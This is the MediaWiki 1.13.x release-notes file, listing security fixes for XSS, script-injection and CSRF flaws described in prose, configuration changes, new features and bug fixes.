= MediaWiki release notes = For upgrade instructions please see the UPGRADE file in this directory. == MediaWiki 1.13.4 == February 7, 2009 This is a security update to the Summer 2008 snapshot release of MediaWiki. MediaWiki is now using a "continuous integration" development model with quarterly snapshot releases. The latest development code is always kept "ready to run", and in fact runs our own sites on Wikipedia. Release branches will continue to receive security updates for about a year from first release, but nonessential bugfixes and feature developments will be made on the development trunk and appear in the next quarterly release. Those wishing to use the latest code instead of a branch release can obtain it from source control: http://www.mediawiki.org/wiki/Download_from_SVN == Changes since 1.13.3 == A number of cross-site scripting (XSS) security vulnerabilities were discovered in the web-based installer (config/index.php). These vulnerabilities all require a live installer -- once the installer has been used to install a wiki, it is deactivated. Note that cross-site scripting vulnerabilities can be used to attack any website in the same cookie domain. So if you have an uninstalled copy of MediaWiki on the same site as an active web service, MediaWiki could be used to attack the active service. If you are hosting an old copy of MediaWiki that you have never installed, you are advised to remove it from the web. == Changes since 1.13.2 == David Remahl of Apple's Product Security team has identified a number of security issues in previous releases of MediaWiki. Subsequent analysis by the MediaWiki development team expanded the scope of these vulnerabilities. The issues with a significant impact are as follows: * An XSS vulnerability affecting all MediaWiki installations between 1.13.0 and 1.13.2. [CVE-2008-5249] * A local script injection vulnerability affecting Internet Explorer clients for all MediaWiki installations with uploads enabled. [CVE-2008-5250] * A local script injection vulnerability affecting clients with SVG scripting capability (such as Firefox 1.5+), for all MediaWiki installations with SVG uploads enabled. [CVE-2008-5250] * A CSRF vulnerability affecting the Special:Import feature, for all MediaWiki installations since the feature was introduced in 1.3.0. [CVE-2008-5252] XSS (cross-site scripting) vulnerabilities allow an attacker to steal an authorised user's login session, and to act as that user on the wiki. The authorised user must visit a web page controlled by the attacker in order to activate the attack. Intranet wikis are vulnerable if the attacker can determine the intranet URL. Local script injection vulnerabilities are like XSS vulnerabilities, except that the attacker must have an account on the local wiki, and there is no external site involved. The attacker uploads a script to the wiki, which another user is tricked into executing, with the effect that the attacker is able to act as the privileged user. CSRF vulnerabilities allow an attacker to act as an authorised user on the wiki, but unlike an XSS vulnerability, the attacker can only act as the user in a specific and restricted way. The present CSRF vulnerability allows pages to be edited, with forged revision histories. Like an XSS vulnerability, the authorised user must visit the malicious web page to activate the attack. These four vulnerabilities are all fixed in this release. David Remahl also reminded us of some security-related configuration issues: * By default, MediaWiki stores a backup of deleted images in the images/deleted directory. If you do not want these images to be publically accessible, make sure this directory is not accessible from the web. MediaWiki takes some steps to avoid leaking these images, but these measures are not perfect. * Set display_errors=off in your php.ini to avoid path disclosure via PHP fatal errors. This is the default on most shared web hosts. * Enabling MediaWiki's debugging features, such as $wgShowExceptionDetails, may lead to path disclosure. Other changes in this release: * Avoid fatal error in profileinfo.php when not configured. * Add a .htaccess to deleted images directory for additional protection against exposure of deleted files with known SHA-1 hashes on default installations. * Avoid streaming uploaded files to the user via index.php. This allows security-conscious users to serve uploaded files via a different domain, and thus client-side scripts executed from that domain cannot access the login cookies. Affects Special:Undelete, img_auth.php and thumb.php. * When streaming files via index.php, use the MIME type detected from the file extension, not from the data. This reduces the XSS attack surface. * Blacklist redirects via Special:Filepath. Such redirects exacerbate any XSS vulnerabilities involving uploads of files containing scripts. * Internationalisation updates. == Changes since 1.13.1 == * Security: Work around misconfiguration by requiring strict comparisons for in_array in User::isAllowed(). * (bug 14944) Added $wgShellLocale for configuration of an appropriate locale to use for LC_CTYPE during shell invocation. For servers that don't have en_US.utf8. Also added locale detection during install. * Localisation updates * Security: Fixed XSS vulnerability in useskin parameter. == Changes since 1.13.0 == * (bug 15460) Fixed intermittent deadlock errors and poor concurrent performance for installations without memcached. * (bug 13770) Fixed DOM module detection for installations with both dom and domxml. * (bug 15148) Fixed Special:BlockIP for PostgreSQL * Fixed SQLite support for non-memcached installations * Localisation updates, Achinese (ace) added. == Changes since 1.13.0rc2 == * (bug 13770) Fixed incorrect detection of PHP's DOM module * Fix regression from r37834: accesskey tooltip hint should be given for the minor edit and watch labels on the edit page. * Updated Chinese simplified/traditional conversion tables == Changes since 1.13.0rc1 == * $wgForwardSearchUrl has been removed entirely. Documented setting since 1.4 has been $wgSearchForwardUrl. * (bug 14907) DatabasePostgres::fieldType now defined. * (bug 14966) Fix SearchEngineDummy class for silently non-functional search on Sqlite instead of horribly fatal error breaky one. * (bug 14987) Only fix double redirects on page move when the checkbox is checked * (bug 13376) Use $wgPasswordSender, not $wgEmergencyContact, as return address for page update notification mails. * API: Registration time of users registered before the DB field was created is now shown as empty instead of the current time. * (bug 14904): fragments were lost when redirects were fixed. * Added magic word __STATICREDIRECT__ to suppress the redirect fixer * (bug 15035) Revert English linkTrail to /^([a-z]+)(.*)$/sD, as it was before r36253. Multiple reports of breakage due to old (pre-5.0) PCRE libraries, both bundled with PHP and packaged with distros such as RHEL. * (bug 14944) Shell invocation of external programs such as ImageMagick convert was broken in PHP 5.2.6, if the server had a non-UTF-8 locale. == Changes since 1.12 == === Configuration changes in 1.13 === * New option $wgFeed can be set false to turn off syndication feeds * (bug 5745) Special:Whatlinkshere now shows up to $wgMaxRedirectLinksRetrieved links through each redirect instead of hardcoded 500 * Set $wgUploadSizeWarning to false by default * Added $wgLBFactoryConf, for generic configuration of multi-master wiki farms * Removed $wgAlternateMaster, use $wgLBFactoryConf * (bug 13562) Misspelled option $wgUserNotifedOnAllChanges changed to $wgUserNotifiedOnAllChanges * (bug 12860) New option $wgSitemapNamespaces allows sitemaps to be generated for only some namespaces * Removed the emailconfirmed implicit group by default. To re-add it, use: $wgAutopromote['emailconfirmed'] = APCOND_EMAILCONFIRMED; in your LocalSettings.php. * (bug 2396) New shared database configuration variables. $wgSharedPrefix allows you to use a shared database with a different prefix. Or you can now use a local database and use prefixes to separate wiki and the shared tables. And the new $wgSharedTables variable allows you to specify a list of tables to share. * Automatic edit summaries can be disabled with $wgUseAutomaticEditSummaries * Duplicates of images are now shown on the image page * $wgRCFilterByAge allows for the list of dates in recent changes special pages to be filtered to only those within the range of $wgRCMaxAge * $wgRCLinkLimits and $wgRCLinkDays allow for customization of the list and limits displayed on the recent changes special pages * The "createpage" permission is no longer required when uploading if the target image page already exists * $wgMaximumMovedPages restricts the number of pages that can be moved at once (default 100) with the new subpage-move functionality of Special:Movepage * Hooks display in Special:Version is now disabled by default, use $wgSpecialVersionShowHooks = true; to enable it. * $wgActiveUserEditCount sets the number of edits that must be performed over a certain number of days to be considered active * $wgActiveUserDays is that number of days * $wgRateLimitsExcludedGroups has been deprecated in favor of $wgGroupPermissions[]['noratelimit']. The former still works, however. * New $wgGroupPermissions option 'move-subpages' added to control bulk-moving subpages along with pages. Assigned to 'user' and 'sysop' by default. * New $wgRC2UDPOmitBots allows user to omit bot edits from UDP output. Default: false * Removed $wgEnableCascadingProtection option. Disabling cascading protection is no longer possible. * $wgMessageCacheType defines now the type of cache used by the MessageCache class, previously it was choosen based on $wgParserCacheType * $wgExtensionAliasesFiles option to simplify adding aliases to special pages provided by extensions, in a similar way to $wgExtensionMessagesFiles * Added $wgXMLMimeTypes, an array of XML mimetypes we can check for with MimeMagic. * Added $wgDirectoryMode, which allows for setting the default CHMOD value when creating new directories. * (bug 14843) $wgCookiePrefix can be set by LocalSettings now, false defaults current behavior. === New features in 1.13 === * __HIDDENCAT__ on a category page causes the category to be hidden on the article page * Do not show edit permissions errors on a red link click, just redirect to the article. This is so that readers who don't know what a red link is are not confused when they are told they are range-blocked. * Add a new hook ImageBeforeProduceHTML to allow extensions to modify wikitext image syntax output * (bug 13100) Added 'preloadtitle' parameter to action=edit§ion=new that pre-fills the section title field * (bug 13112) Added Special:RelatedChanges alias to Special:RecentChangesLinked * (bug 13130) Moved edit token and autosummary fields above edit tools to reduce broken form submissions * Add --old-redirects-only option to maintenance/refreshLinks.php, to add old redirects to the redirect table * Add links to page and file deletion forms to edit predefined delete reasons * (bug 13269) Added MediaWiki:Uploadfooter to the bottom of Special:Upload * (bug 2815) Search results for media now use thumbnail instead of text extract * When a page doesn't exist, the tab should say "create", not "edit" * (bug 12882) Added a span with class "patrollink" around "Mark as patrolled" link on diffs * Magic word formatnum can now take raw suffix to undo formatting * Add updatelog table to reliably permit updates that don't change the schema * Add category table to allow better tracking of category membership counts ** (bug 1212) Give correct membership counts on the pages of large categories ** Use category table for more efficient display of Special:Categories * (bug 1459) Search for duplicate files by hash: Special:FileDuplicateSearch * (bug 9447) Added hooks for search result headings * Image redirects are now enabled by default * (bug 13450) Email confirmation can now be canceled before the expiration * (bug 13490) Show upload/file size limit on upload form * Redesign of Special:UserRights * Make rev_deleted log entries more intelligible * (bug 6943) Added PAGESINCATEGORY: magic word * (bug 13604) Added Special:ListGroupRights * (bug 6332, 8617) Added message 'mainpage-description' as duplicate of 'mainpage' and added it to message 'sidebar' * Automatically add old redirects to the redirect table when needed * (bug 6934) Allow inclusions, links, redirects to be separately toggled on or off on Special:WhatLinksHere * Cache image redirects * (bug 10457) Organize Special:SpecialPages into sections * Add a new hook EditPageBeforeConflictDiff to allow extensions like FCKeditor to modify the output for edit conflicts * Add class="nested" for
s so fieldsets inside fieldsets get a slightly less huge margin and padding * (bug 13527) Use sitemaps.org format 0.9 instead of a Google-specific format * Allow \C and \Q as TeX commands to match \R, \N, \Z * On Special:UserRights, when you can add a group you can't remove or remove one you can't add, a notice is printed to warn you * (bug 12698) Create PAGESIZE parser function, to return the size of a page * Allow the "log in / create account" link in the toolbar to have different text from Special:UserLogin title (new message 'nav-login-createaccount') * Say "log in / create account" if an anonymous user can create an account, otherwise just "log in", consistently across skins * Special:Shortpages and Special:Longpages now returns pages in all content namespaces, not just NS_MAIN. * (bug 889) Improve conflict-handling between shared upload repository and local one * Update documentation links in auto-generated LocalSettings.php * (bug 13584) The new hook SkinTemplateToolboxEnd was added. * (bug 709) Cannot rename/move images and other media files [EXPERIMENTAL] * Custom rollback summaries now accept the same arguments as the default message * (bug 12542) Added hooks for expansion of Special:Listusers * Drop-down AJAX search suggestions (turn on $wgEnableMWSuggest) * More relevant search snippets (turn on $wgAdvancedSearchHighlighting) * (bug 13950) Allow users to watch the user/talk pages of users they block. * (bug 13970) Allow MonoBook-based skins to specify their own print stylesheet * Show image links on Special:Whatlinkshere * Use rel="start", "prev", "next" appropriately on Pager-based pages * Add support for SQLite * AutoAuthenticate hook renamed to UserLoadFromSession * (bug 13232) importScript(), importStylesheet() funcs available to custom JS * (bug 13095) Search by first letters or digits in [[Special:Categories]] * Users moving a page can now move all subpages automatically as well * (bug 14259) Localisation message for upload button on Special:Import is now 'import-upload' instead of 'upload' * Add information about user group membership to Special:Preferences * (bug 14146) Wrap usage section on imagepages into
s. * New layout for Special:Specialpages. Restricted pages are marked but not separated from other pages in their group. * (bug 14263) Show a diff of the revert on rollback notification page. * (bug 13434) Show a warning when hash identical files exist * Sidebar is now cached for all languages * The User class now contains a public function called isActiveEditor. Figures out if a user is active based on at least $wgActiveUserEditCount number of edits in the last $wgActiveUserDays days. * SpecialSearchResults hook now passes results by reference, so they can be changed by extensions. * Add a new hook LinkerMakeExternalLink to allow extensions to modify the output of external links. * (bug 14132) Allow user to disable bot edits from being output to UDP. * (bug 14328) jsMsg() within Wikibits now accepts a DOM object, not just a string * (bug 14558) New system message (emailuserfooter) is now added to the footer of e-mails sent with Special:Emailuser * Add support for Hijri (Islamic) calendar * Add a new hook LinkerMakeExternalImage to allow extensions to modify the output of external (hotlinked) images. * (bug 14604) Introduced the following features for the LanguageConverter: Multi-tag support, single conversion flag, remove conversion flag on a single page, description flag, variant name, multi-variant fallbacks. * Add zh-mo and zh-my variants for the zh language * (bugs 4832, 9481, 12890) Special:Recentchangeslinked now has all options that are in Special:Recentchanges * Allow an $error message to be passed to ArticleDelete hook * Allow extensions to modify the user creation form by calling addInputItem(); * Add meta generator tag to HTML output * MediawikiPerformAction hook is now passed the Mediawiki object * Added blank special page Special:BlankPage for benchmarking, etc. * Foreign repo file descriptions and thumbnails are now cached. * (bug 11732) Allow localisation of edit button images * Allow the search box, toolbox and languages box in the Monobook sidebar to be moved around arbitrarily using special sections in [[MediaWiki:Sidebar]]: SEARCH, TOOLBOX and LANGUAGES * Add a new hook NormalizeMessageKey to allow extensions to replace messages before the database is potentially queried * (bug 9736) Redirects on Special:Fewestrevisions are now marked as such. * New date/time formats in Cs localization according to ČSN and PČP. * Special:Recentchangeslinked now includes changes to transcluded pages and displayed images; also, the "Show changes to pages linked" checkbox now works on category pages too, showing all links that are not categorizations * (bug 4578) Automatically fix redirects broken by a page move === Bug fixes in 1.13 === * (bug 10677) Add link to the file description page on the shared repository * (bug 13084) Increase size of source/destination filename fields in upload form * (bug 13115) rebuildrecentchanges should print the current value of $wgRCMaxAge * (bug 13140) Show parent categories in category namespace * (bug 13149) Correctly format 'fileexists' message on Upload page * Make the default filepageexists message accurate * (bug 12988) $wgMinimalPasswordLength no longer breaks create user by email * (bug 13022) Fix upload from URL on PHP 5.0.x * (bug 13132) Unable to unprotect pages protected with earlier versions of MediaWiki * (bug 12723) OpenSearch description name now uses more compact language code to avoid passing the length limit as often, is customizable per site via 'opensearch-desc' message. * (bug 13135) Special:Userrights now passes IDs through form submission to allow functionality on not-quite-right usernames * (bug 12575) Prevent duplicate patrol log entries from being created * (bug 13174) __HIDDENCAT__ now applies only to category pages * (bug 13031) Add links to user pages in e-mail form * (bug 13147) Description for categoriespagetext (used in Special:Categories) reworded * (bug 11561) Fix fatal error when calling action=revert to non-image page * (bug 12430) Fix call to private method LinkFilter::makeRegex fatal error in maintenance/cleanupSpam.php * All skins should have the "mediawiki" class on the body element * (bug 13019) Message cache for some extensions not loaded at time of editing * (bug 13247) Prettified ISBN links * maintenance/refreshLinks.php did not fix page_id 1 with the --new-only option * (bug 13110) Don't show "Permission error" page if the edit is already rolled back when using rollback * (bug 13012) Use content messages for block options when generating the recentchanges entry * (bug 13274) Change links for messages to ucfirst * (bug 13273) Un-hardcode some punctuation (add new messages colon-separator, autocomment-prefix) * Parse MediaWiki message translations with a correct language setting on preview * (bug 13281) Treat X-Forwarded-For, Client-ip and User-Agent headers as case-insensitive names. * Adding the fix for lists in RTL wikis to more skins, and fixing the image toc * (bug 8157) Remove redirects from Special:Unusedtemplates. Patch by WebBoy. * (bug 10721) Duplicate section anchors with differing case now disambiguated for Internet Explorer's sake and standards compliance * (bug 13298) Tighter limits on Special:Newpages limits when embedding * Email subject in content language instead of sending user's UI language * (bug 13251) Allow maintenance rebuild scripts to work with Postgres * (bug 2084) Fixed incorrect regex to match redirects * (bug 3131) Manually-specified upload destination filename is no longer overwritten by browsing for a file after you wrote it. * (bug 7251) Sidebars generated by MediaWiki:Sidebar now have the class 'generated-sidebar'. * (bug 13265) Media handler is missing 'image/x-bmp' * (bug 13407) MediaWiki:Powersearch is used in two places * (bug 13403) Fix cache invalidation of history pages when old revisions change * (bug 11563) Deprecated SearchMySQL4 class; merged code to SearchMySQL * (bug 12801) Fix link in subtitle message in AJAX search * (bug 13428) Fix regression in protection form layout HTML validity * (bug 9403) Sanitize newlines from search term input * (bug 13429) Separate date and time in message sp-newimages-showfrom * (bug 13137) Allow setting 'editprotected' right separately from 'protect', so groups may optionally edit protected pages without having 'protect' perms * Disallow deletion of big pages by means of moving a page to its title and using the "delete and move" option. * (bug 13466, 13632) White space differences not shown in diffs * (bug 1953) Search form now honors namespace selections more reliably * (bug 12294) Namespace class renamed to MWNamespace for PHP 5.3 compatibility * PHP 5.3 compatibility fix for wfRunHooks() called with no parameters * (bug 6447) Trackbacks now work with transactional tables, if enabled * (bug 6892, 7147) Trackback error handling, optional fields more robust * (bug 6813) Don't break HTML validator when using trackbacks * Fix for size checks on SVG images with global 'stroke-width' attribute * (bug 11874) Inline CSS with !important no longer borken * (bug 1600) Strip extra == section markup == in new-comment field * (bug 11325) Wrapped page titles in MonoBook skin spaced more nicely * (bug 12077) Fix HTML nesting for TOC * (bug 344) Purge cache for talk/article pages when deleting the other tab * (bug 13436) Treat image captions correctly when they include option keywords (like ending with "px" or starting with "upright") * Trackback display formatting fixed * Don't die when single-element arrays are passed to SQL query constructors that have an array index other than 0 * (bug 13522) Fix fatal error in Parser::extractTagsAndParams * (bug 13532) Use proper timestamp call when reverting images * (bug 13543) Updated FAQ link in the installer sidebar * (bug 13540) Date format in confirmation e-mail now matches message language * (bug 13554) PHP Notice in old pre-processor when list item is empty. * (bug 13556) Don't show a blank form if no image is attached in Special:Upload * (bug 13576) maintenance/rebuildrecentchanges.php fails * (bug 13441) Allow Special:Recentchanges to show bots only * (bug 13431) Show true message source in Special:Allmessages&ot=php / xml * (bug 13463) Login successful page doesn't use user's preferred interface language * (bug 13630) Fixed warnings for pass by reference at call time in Special:Revisiondelete when generating the log entry. * (bug 12064) BeforePageDisplay hook is now called for all skins * (bug 13624) Fix regression with manual thumb= parameter on images * (bug 11039) Add missing labels on protection form * (bug 13458) Preview/edit toolbar spacing now works consistently * (bug 13433) Fix action=render on Image: pages * (bug 13678) Fix CSS validation for Monobook * (bug 13684) Links in Special:ListGroupRights should be in content language * (bug 13690) Fix PHP notice on accessing some URLs * Hide (undo) link if user isn't able to edit page * Invalidate cache of pages that includes images via redirects on upload * (bug 13705) Don't show rollback link in page history on incorrect revisions * (bug 13708) Don't set "Search results" title when loading Special:Search without query * (bug 13736) Don't show MediaWiki:Anontalkpagetext on non-existant IP addresses * (bug 13728) Don't trim initial whitespace during section edits * (bug 13727) Don't delete log entries from recentchanges on page deletion * (bug 13752) Redirects to sections now work again * (bug 13725) Upload form watch checkbox state set correctly with wpDestFile * (bug 13756) Don't show the form and navigation links of Special:Newpages if the page is included * When hiding things on WhatLinksHere, generated URLs should hide them too * Properly escape search terms with regex chars so they appear highlighted in search results * (bug 13768) pt_title field encoding fixed * Do not display empty columns on Special:UserRights if all groups are changeable or all unchangeable * Fix fatal error on calling PAGESINCATEGORY with invalid category name * (bug 13793) Special:Whatlinkshere filters wrong - after paginating instead of before * (bug 13796) Show links to parent pages even if some of them are missing * (bug 13816) Filter by main namespace doesn't work on WhatLinksHere * (bug 13822) Fatal error on some pages when calculating subpage subtitle * (bug 13824) AJAX search suggestion now works with non-SkinTemplate skins * Added 'application/x-dia-diagram' MediaWiki's known MIME types * (bug 13866) skins/common/shared.css - invalid attribute fixing * Hide edit section links on Special:Undelete * (bug 13860) Fix "Justify paragraphs" option for Modern skin * (bug 13168) accessibility links in Modern skin link to wrong anchor id * (bug 13185) No line break after 'subpages' class in Modern skin * (bug 13583) No "poweredby" in Modern skin * (bug 13880) "Printable" link in Modern skin now formats as print mode * (bug 13885) Bump default $wgSVGMaxSize from 1024 to 2048 pixels * (bug 13891) Show categories box even if all categories are hidden and user has "show hidden categories" option on * (bug 13915) Undefined variable $wltsfield in includes/SpecialWatchlist.php * (bug 13913) Special:Whatlinkshere now has correct HTML markup * (bug 13905) Blacklist Mac IE from HttpOnly cookies; it eats them sometimes * (bug 13922) Fix bad HTML on empty Special:Prefixindex and Special:Allpages * (bug 13924) Fix bad HTML on power search form * (bug 13820) Fix updater for rev_parent_id population * (bug 13925) Fix bad HTML on search results list * (bug 13934) Fixing the link to GNU General Public License Version 2 * Show correct accesskey prefix for Firefox 3 beta (Alt-Shift-, not Alt-) * (bug 13949) Special:PrefixIndex/AllPages paging links contain invalid XML * (bug 13770) Use Preprocessor_Hash by default to avoid missing DOM module errors * (bug 13982) Disable ccmeonemails preference when user-to-user mails disabled * (bug 13615) Update case mappings and normalization to Unicode 5.1.0 Note that case mappings will only be used if mbstring extension is not present. * (bug 14044) Don't increment page view counters on views from bot users * (bug 14042) Calling Database::limitResult() misplaced the comment in the log file * (bug 14047) Fix regression in installer which hid DB-specific options Also makes SQLite path configurable in the installer. * (bug 13546) Follow image redirects on image page * (bug 12644) Template list on edit page now sorted on preview * (bug 14058) Support pipe trick for namespaces and interwikis with "-" * Message name filter on Special:Allmessages now case-insensitive * (bug 13943) Fix image redirect behaviour on image pages * (bug 14093) Do 'sysop' => 'protect' magic in Title::isValidMoveOperation * (bug 14063) Power search form missing